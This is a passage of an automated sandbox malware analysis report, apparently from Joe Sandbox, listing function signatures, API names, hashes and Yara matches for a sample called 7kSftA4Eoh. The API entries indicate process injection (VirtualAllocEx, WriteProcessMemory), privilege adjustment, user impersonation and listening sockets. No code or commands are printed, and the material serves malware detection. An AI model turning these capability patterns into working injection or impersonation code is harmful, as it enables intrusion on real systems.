                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                  • String ID:
                                                                  • API String ID: 4278921479-0
                                                                  • Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                                                  • Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
                                                                  • Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                                                  • Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastVirtual$AllocFreeMemoryProcessProtectWrite
                                                                  • String ID:
                                                                  • API String ID: 2897431253-0
                                                                  • Opcode ID: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
                                                                  • Instruction ID: 3c122c00871b3b5210f334adf2322d112136253a2f0dca973dd44468aaa45b43
                                                                  • Opcode Fuzzy Hash: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
                                                                  • Instruction Fuzzy Hash: 8C310122704B5087DF24AF6AA8447AE73A4BB86F94F0444249E8E83795EF3CC906C790
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonsioctlsocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1425508107-0
                                                                  • Opcode ID: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
                                                                  • Instruction ID: 96d79a1c6da8bcb37b6513098c02166529d391161a8901be4435bbc37aaacdf1
                                                                  • Opcode Fuzzy Hash: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
                                                                  • Instruction Fuzzy Hash: DE11D022308B54C2DB248F16F81036AB3A5F788FB8F990A24EE5A47794DF7CD8458740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonlhtonsioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 2462908977-0
                                                                  • Opcode ID: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
                                                                  • Instruction ID: 0f4d5e49fdb2c7e4d9dca190e0aa483ee870ec82d6f273ab5c581e8a2c4ed6e3
                                                                  • Opcode Fuzzy Hash: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
                                                                  • Instruction Fuzzy Hash: 7211BE26310B4086EB249F21F8143D93760F789BB8F554625AE6A437D1EFBCD94ACB50
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A2296
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • VirtualAllocEx.KERNEL32 ref: 009A22E1
                                                                  • WriteProcessMemory.KERNEL32 ref: 009A2305
                                                                  • free.LIBCMT ref: 009A231B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Alloc_errno$HeapMemoryProcessVirtualWrite_callnewhfreemalloc
                                                                  • String ID: @
                                                                  • API String ID: 1963606803-2766056989
                                                                  • Opcode ID: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
                                                                  • Instruction ID: efc6629070d87daba8478558da0aad19e394fd06c5c27c9d7d32aae4e8c00095
                                                                  • Opcode Fuzzy Hash: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
                                                                  • Instruction Fuzzy Hash: C9210276708B4086DA20CF1AF85075ABBA8F7C9F90F894525AE9D83B25DF3CC546C780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountSleepTick$Startupclosesocket
                                                                  • String ID:
                                                                  • API String ID: 2132357648-0
                                                                  • Opcode ID: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
                                                                  • Instruction ID: cffa6a388a5eb79b11e718aa0fef00849408d53743848e93a6122a6cbfbc719c
                                                                  • Opcode Fuzzy Hash: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
                                                                  • Instruction Fuzzy Hash: 37118E21605B8482DE10AB66F45535AA359B7C5BF0F444720AABE43BE5DE3CC5468B40
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                                                  • GetTickCount.KERNEL32 ref: 004019F0
                                                                  • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                                                  • Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
                                                                  • Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                                                  • Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonslistensocket
                                                                  • String ID:
                                                                  • API String ID: 3426924835-0
                                                                  • Opcode ID: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
                                                                  • Instruction ID: 3697b0794098404fc7b932079964f9ba799b85cb960c59f893b7e1c5dcc5c024
                                                                  • Opcode Fuzzy Hash: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
                                                                  • Instruction Fuzzy Hash: 1511DD26200A6486EA24AF52E80435AB364F785BF4F444625EEAA07BD9DF3CC50AC744
                                                                  APIs
                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 0099FE9E
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0099FECE
                                                                  • GetLastError.KERNEL32 ref: 0099FED8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                  • String ID: %s
                                                                  • API String ID: 4244140340-620797490
                                                                  • Opcode ID: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
                                                                  • Instruction ID: 56a16ed30d0f93c67f9121449a59ca47e491f0679fd420dc8e090f029866b0c1
                                                                  • Opcode Fuzzy Hash: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
                                                                  • Instruction Fuzzy Hash: 7D218E72B00B4199EB10DFB5E4547ED73B9E798B88F44486A8E0C93B59EF74C615C380
                                                                  APIs
                                                                    • Part of subcall function 009AA564: CloseHandle.KERNEL32 ref: 009AA574
                                                                    • Part of subcall function 009AA564: RevertToSelf.ADVAPI32 ref: 009AA582
                                                                  • LogonUserA.ADVAPI32 ref: 009AA824
                                                                  • GetLastError.KERNEL32 ref: 009AA82E
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                    • Part of subcall function 009AAA24: GetTokenInformation.ADVAPI32 ref: 009AAAB9
                                                                  • ImpersonateLoggedOnUser.ADVAPI32 ref: 009AA84C
                                                                  • GetLastError.KERNEL32 ref: 009AA856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiUserWide$CloseHandleImpersonateInformationLoggedLogonRevertSelfTokenmalloc
                                                                  • String ID:
                                                                  • API String ID: 2370685222-0
                                                                  • Opcode ID: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
                                                                  • Instruction ID: f2dfbc6c967347d7bdbc8a27a3d16a47d678c0616c53a4855a7af90f675bb950
                                                                  • Opcode Fuzzy Hash: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
                                                                  • Instruction Fuzzy Hash: C3319134708B4086FB01EBA6F85432ABB66A7C6BD4F54412ADD99477B7EF3CC4418380
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 009A3FAF
                                                                    • Part of subcall function 0099ED34: WSAStartup.WS2_32 ref: 0099ED52
                                                                  • Sleep.KERNEL32 ref: 009A3FFE
                                                                  • GetTickCount.KERNEL32 ref: 009A4004
                                                                  • WSAGetLastError.WS2_32 ref: 009A400E
                                                                    • Part of subcall function 009A4154: ioctlsocket.WS2_32 ref: 009A4176
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepStartupioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 3100619841-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $<
                                                                  • API String ID: 0-428540627
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _initp_misc_winsig
                                                                  • String ID:
                                                                  • API String ID: 2710132595-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
                                                                  • Instruction ID: 421300a38df063c68a65ba9eb2a1300f0f428f0da5e76fb4bf41f3a9721d3a84
                                                                  • Opcode Fuzzy Hash: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
                                                                  • Instruction Fuzzy Hash: 2F511BB6614A508BD714CB09E4D0B2BB7E1F3CCB94F84461AE39A87768DA3CD645DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
                                                                  • Instruction ID: f39ceafa6f48f6d83c3e3849364aa727386b51efd6f9a38a824e052eaa85970e
                                                                  • Opcode Fuzzy Hash: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
                                                                  • Instruction Fuzzy Hash: 7B0136CBE5EED40AD72376640E7A1D82FADA4B6F3534D814ECB5053283F4CA5D055212
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction ID: 040a81dcf2f050336bda00ad6163e1b97f4a0e7d9bd373c2026e90d71216a3c6
                                                                  • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                                                  • Instruction Fuzzy Hash: 4DD0C7D7F5DFD096D32281A40CB60593F91B4F291031E80AF4E40A33D3741C1C055315
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction ID: 0f26f9567e189b2c13289b42b0608cbdf9b2efb83227e6d68dd31f271b7da4a2
                                                                  • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                                  • Instruction Fuzzy Hash: 8ED05ECBE1DBD486E36382684E2D2C92F6CA172A3074C408FC74006393E44A2801D311
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction ID: 122cdc85b36f9b2d01b635b9443545710c3fd5c81193500c444b5acb9b787d9b
                                                                  • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                                                  • Instruction Fuzzy Hash: 8EC04C57A189D04797126E1409A61D42B9AE5D2D3238E82998D5143D43514A5C17A311
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction ID: f0417758bf733833de28a2c53c38d17da1fcecface7511996c469d52c4a9ad68
                                                                  • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                                                  • Instruction Fuzzy Hash: 82C0129BE1DED44AE32341540D790ED3E9A90B2D2030D4146CF4802163A1450C005351
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
